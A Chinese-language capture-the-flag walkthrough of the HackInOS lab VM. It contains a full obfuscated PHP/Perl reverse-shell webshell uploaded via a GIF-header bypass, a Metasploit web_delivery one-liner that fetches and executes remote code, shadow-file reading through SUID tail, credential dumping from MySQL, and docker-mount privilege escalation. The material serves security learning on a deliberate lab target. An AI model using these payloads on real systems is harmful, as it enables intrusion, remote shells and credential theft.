HackInOS渗透实战
HackInOS渗透实战
该靶机很好玩,上马getshell,msf内网穿透,docker提权,简直帅炸了,无奈我的实力只能打到一半,很多都是查看国外大黑牛的教程……
靶机ip:192.168.56.101
nmap全扫
nmap -sS -Pn -A -p- -n 192.168.56.101
image.png
8000WEB渗透
http://192.168.56.101:8000/
image.png
又是一个wordpress建站
http://192.168.56.101:8000/?author=1 得到管理员的用户名Handsome_Container
image.png
这个站点有点假,login都指向localhost,未开发完成的
访问以下robots.txt
image.png
User-agent:*
Disallow:/upload.php
Disallow:/uploads
访问http://192.168.56.101:8000/upload.php
image.png
能上传图片,先右键下源码,发现最低端有个提示
image.png
访问看看 https://github.com/fatihhcelik/Vulnerable-Machine---Hint
image.png
看来靶机作者有提示
查看下upload.php的源码:
image.png
发现了上传必须以图片的格式 (png或者gif),但并没有过滤后缀名,尝试头部添加gif识别
上传后在图片名称后添加1-100的随机数,并进行md5加密,且全部转为小写
至此,我们可以上传包含一句话的图片马
gif98大法,上马getshell
抓包,改头部,用gif98大法上传图片马
image.png
但我们并不知道上传后的路径和名称,所以采用跑目录的方式,爆出上传的反弹shell
通过python脚本生成shell.php经过md5加密后的名称,然后进行dir爆破
python源码如下:
#!/usr/bin/python
import hashlib
for i in range(100):
file = "shell.php" + str(i)
hash = hashlib.md5(file.encode())
dir = hash.hexdigest() + ".php"
f = open("dict.txt", "a+")
f.write(dir+"\r\n")
f.close()
爆破发现了该上传的加密的目录,
dirb http://192.168.56.101:8000/uploads/ dict.txt
image.png
但是很快被删除,所以速度要快
再次尝试上传GIF98头部的反弹shell马
使用猥琐的php反弹shell马,可过firewall,好用
<?php
function which($pr) {
$path = execute("which $pr");
return ($path ? $path : $pr);
}
function execute($cfe) {
$res = '';
if ($cfe) {
if(function_exists('exec')) {
@exec($cfe,$res);
$res = join("\n",$res);
} elseif(function_exists('shell_exec')) {
$res = @shell_exec($cfe);
} elseif(function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
} elseif(@is_resource($f = @popen($cfe,"r"))) {
$res = '';
while(!@feof($f)) {
$res .= @fread($f,1024);
}
@pclose($f);
}
}
return $res;
}
function cf($fname,$text){
if($fp=@fopen($fname,'w')) {
@fputs($fp,@base64_decode($text));
@fclose($fp);
}
}
$yourip = "192.168.56.102";
$yourport = '4444';
$usedb = array('perl'=>'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>
截包上传后,跑目录发现该上传的文件,kali开启nc端口监听,直接反弹
dirb http://192.168.56.101:8000/uploads/ dict.txt
image.png
image.png
su root
先用python切一下交互式的shell,好看一点
python -c 'import pty;pty.spawn("/bin/bash")'
翻一下wordpress的用户和密码,也许等下有用
image.png
不妨先寻找下该靶机上可执行的二进制的文件,也许能使用普通用户执行root命令
find / -perm -4000 2> /dev/null
image.png
可以使用tail命令查看文件,使用tail尝试查看下passwd或者shadow文件
直接进入靶机的etc目录下,发现cat没有权限查看shadow,直接用tail
tail shadow
读不到什么,先用tail --help 查看一下帮助
发现 -c 参数可以以字节位置读取文件,其他附加参数,-K 可以读1024位
tail -c1K shadow
image.png
拿到了root用户的密码hash
root:$6$qoj6/JJi$FQe/BZlfZV9VX8m0i25Suih5vi1S//OVNpd.PvEVYcL1bWSrF3XTVTF91n60yUuUMUcP65EgT8HfjLyjGHova/:17951:0:99999:7:::
拿去john解下
image.png
解出来的密码就是john,登录ssh失败
直接su root吧
image.png
拿到了root下的flag
Life consists of details..
内网渗透
msf反弹
本以为这样就结束了,查看靶机的网络状态,发现靶机自己有一个内网地址 172.18.0.3
image.png
看教程,用msf拿反弹shell,进而扫内网,进行内网渗透
利用msf下的web_delivery模块,先 search web-delivery
use exploit/multi/script/web_delivery
配置好相关的IP和端口,进而生成一段payload
image.png
python -c "import sys;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://192.168.56.102:8080/YBFZpUoLLv6g9F');exec(r.read());"
将该payload拿到靶机的rootshell下执行,msf等待反弹
image.png
msf拿到会话
image.png
接下来常规操作
image.png
既然msf已经能打到靶机的内网了,就可以直接扫内网的网段
添加内网路由
切换一下msf的模块,添加通往靶机的路由
use post/multi/manage/autoroute
image.png
通过autoroute已经添加了一跳路由到靶机的eth0
[+] Route added to subnet 172.18.0.0/255.255.0.0 from eth0
扫描内网网段
在msf中继续切换到scanner扫描模块下,进行内网扫描
use auxiliary/scanner/portscan/tcp
set RHOSTS 172.18.0.1-254
set THREADS 10
配置好后直接run
image.png
好久,扫了好久,终于出来了
image.png
[+] 172.18.0.1: - 172.18.0.1:22 - TCP OPEN
[+] 172.18.0.3: - 172.18.0.3:80 - TCP OPEN
[+] 172.18.0.4: - 172.18.0.4:2021 - TCP OPEN
[+] 172.18.0.2: - 172.18.0.2:3306 - TCP OPEN
[+] 172.18.0.1: - 172.18.0.1:8000 - TCP OPEN
可以看到
172.18.0.4开发了2021
172.18.0.2开放了3306
登录0.2段的数据库
在之前的shell中,发现了wordpress目录下的wp-config.php的配置文件,发现了该数据库的用户名和密码都是wordpress
mysql -h 172.18.0.2 -uwordpress -p
image.png
直接进入wordpress数据库找管理员账号和密码
image.png
Handsome_Container: $P$BXJ8ZmtYd5lHZOLPgTccLUhaQLxm0L0
再查看下host_ssh_cred表格:
image.png
得到用户和密码
hummingbirdscyber | e10adc3949ba59abbe56e057f20f883e
解md5的hash正好是123456
拿去ssh登陆
ssh登陆
账号密码:hummingbirdscyber: 123456
查看靶机内网的运行情况
image.png
docker images
发现docker中运行的镜像
按照教程中的提示
以root权限运行该docker虚拟机,直接拿到root权限
docker run -v /:/root -i -t ubuntu /bin/bash
直接get flag!!
总结
1、该靶机前期自己打了好久,上GIF98图片马getshell之后,发现有内网,我自己的想法是用内网穿透工具reGeory进行扫描,无奈尝试了tunnel_nosocket.php后,kali中的proxychain无法连接,也就无法打穿内网。
2、坦白讲,那个python爆目录的脚本是国外的一个大黑的 github上的,我的想法是上传后立刻mv到上级目录中,防止被销毁。
3、拿到假的root进入shell后,发现有docker环境,也是第一次尝试用docker run提权。
总体来说这个靶机作者很用心,能学到不少东西和方法。
靶机百度云下载
链接:https://pan.baidu.com/s/1fhP9DU-Z-UhI2wD4TiiZEg
提取码:pf5b
